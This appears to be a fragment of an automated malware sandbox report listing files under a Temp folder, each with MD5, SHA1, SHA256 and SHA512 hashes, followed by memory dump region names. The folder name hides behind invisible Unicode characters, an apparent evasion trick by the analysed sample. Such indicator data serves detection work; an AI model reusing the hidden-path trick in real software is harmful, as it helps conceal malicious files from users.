C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Downloads\UninstallFormat.docx

MD5 0644f6e3d7aeb3ced98c9a860d0c15c3
SHA1 af747da43ffa79f0d13c91dba4f03a470077d043
SHA256 6c5fc0c4ffdc0357c9962d97b17e3fb666b4e3213f65fd50f948b006bfc1ce32
SHA512 847d7da450b98c21ad2d5918602bf93e906f1d7cd308bcf2673f71f170e480406df325f7f11d56e00ec19a156f52384059b4badfab943a015832b11406657378

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Pictures\ConnectRevoke.png

MD5 a2b8b3135eae285b5b78a05849cd329b
SHA1 b18b1b2c19869299b33465f80ec223e72873b4f4
SHA256 5fea38fbd0cdceaac0e44223f4bcdff00b73af9e61ec2338429798d5182a701b
SHA512 2939ac4308dae2110ad2617691b2f7eb64efbd329a786c58905be5c4c90c5dfc828ea7aeb9507543d37314850f479b157045167254228157a70933bd2f5222f1

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Pictures\DebugSuspend.jpeg

MD5 5f7deb5baa673d813f8db2858930e3ac
SHA1 d83ec872bae4877032def8b1e66d0ee5c5f8dd57
SHA256 f49ec63c3a051ba5755101ee4766baa9deef9b22f1d2c13616faf004751cf6ed
SHA512 d7490fbdd005eab89753f9b34529cfeef76800eb15ac3d3cda7966a1cff97e343cb327005faa3df728d6282fc643f76ddd01b80bc9a9c82a38152b5519d5d2d1

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Pictures\DisablePop.png

MD5 18bc489c09c06f3c472146e553f055ac
SHA1 874715bdaa07c0e88bfe8b42ef6f98ddf4c2047c
SHA256 fe3dccc203ee0c13b6d905a0b8e23e996a5e74af91022a868403a8c17c361d41
SHA512 c17f8bcbe815fbb3e279b87dcb19f6cc785af583218ae424937a8e5d7312e176859f0b45e6907061bef1ba1615de1a004324bd35d2ca32022837374ac5cf766c

C:\Users\Admin\AppData\Local\Temp\‌     ‌‏  \Common Files\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

memory/1688-480-0x00007FF708D50000-0x00007FF709846000-memory.dmp

memory/1688-504-0x00007FF708D50000-0x00007FF709846000-memory.dmp

memory/1688-540-0x00007FF708D50000-0x00007FF709846000-memory.dmp

memory/3344-544-0x00007FF7B1C40000-0x00007FF7B24F0000-memory.dmp